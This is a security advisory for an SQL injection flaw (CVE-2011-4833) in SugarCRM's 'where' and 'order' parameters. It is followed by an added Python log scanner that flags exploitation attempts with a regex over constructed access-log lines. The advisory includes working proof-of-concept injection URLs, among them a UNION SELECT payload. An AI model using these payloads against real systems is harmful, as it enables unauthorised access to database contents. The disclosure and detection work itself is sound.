High-Tech Bridge SA Security Research Lab has discovered a vulnerability in SugarCRM, which can be exploited to perform SQL injection attacks.
- SQL Injection Vulnerability in SugarCRM: CVE-2011-4833
Input passed via the “where” and “order” GET parameters to index.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71%20--%20
http://[host]/index.php?entryPoint=json&action=get_full_list&module=Leads&order=SQL_CODE_HERE%20--%20
Successful exploitation of the vulnerability requires the attacker to be registered and logged in.
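As an added detection example (not part of the advisory and not SugarCRM code), the following script scans web-server access logs for requests to the json entry point's get_full_list action whose "where" or "order" parameter carries SQL syntax, so that exploitation attempts of the kind shown above can be spotted after the fact. The log lines are constructed; the log format and the regular expressions are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the advisory). The second and
# third lines carry payloads of the shape the PoC URLs above describe; the
# first is a benign request to the same action and the fourth is unrelated.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0000] "GET /index.php?entryPoint=json&action=get_full_list&module=Leads&where=0&order=name HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2012:10:00:02 +0000] "GET /index.php?entryPoint=json&action=get_full_list&module=Leads&where=0%29%20union%20select%20version%28%29,2,3%20--%20 HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2012:10:00:03 +0000] "GET /index.php?entryPoint=json&action=get_full_list&module=Leads&order=name%20--%20 HTTP/1.1" 200 1024
10.0.0.7 - - [01/Jan/2012:10:00:04 +0000] "GET /index.php?module=Home&action=index HTTP/1.1" 200 300
"""

# Common-log-format request line: client IP, request target and status code.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# SQL syntax that a legitimate column name or row filter value never needs:
# UNION/SELECT keywords, comment openers, statement separators, quotes, parens.
SQLI_RE = re.compile(r"\bunion\b|\bselect\b|--|/\*|;|'|\"|\)", re.IGNORECASE)
WATCHED_PARAMS = ("where", "order")


def suspicious_params(target):
    """Return the names of the watched parameters whose percent-decoded value
    contains SQL syntax, for one request target; [] when the request does not
    hit the vulnerable action or looks clean."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("entryPoint") != ["json"] or qs.get("action") != ["get_full_list"]:
        return []
    return [name for name in WATCHED_PARAMS
            if any(SQLI_RE.search(v) for v in qs.get(name, []))]


def scan_log(text):
    """Return (client ip, parameter, status) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        for name in suspicious_params(m.group("target")):
            findings.append((m.group("ip"), name, m.group("status")))
    return findings


if __name__ == "__main__":
    for ip, param, status in scan_log(SAMPLE_LOG):
        print(f"{ip} injected SQL via '{param}' (HTTP {status})")
```

A 200 status on a flagged "where" request is worth treating as a likely successful extraction rather than a blocked attempt, since the advisory notes the query runs for any logged-in user.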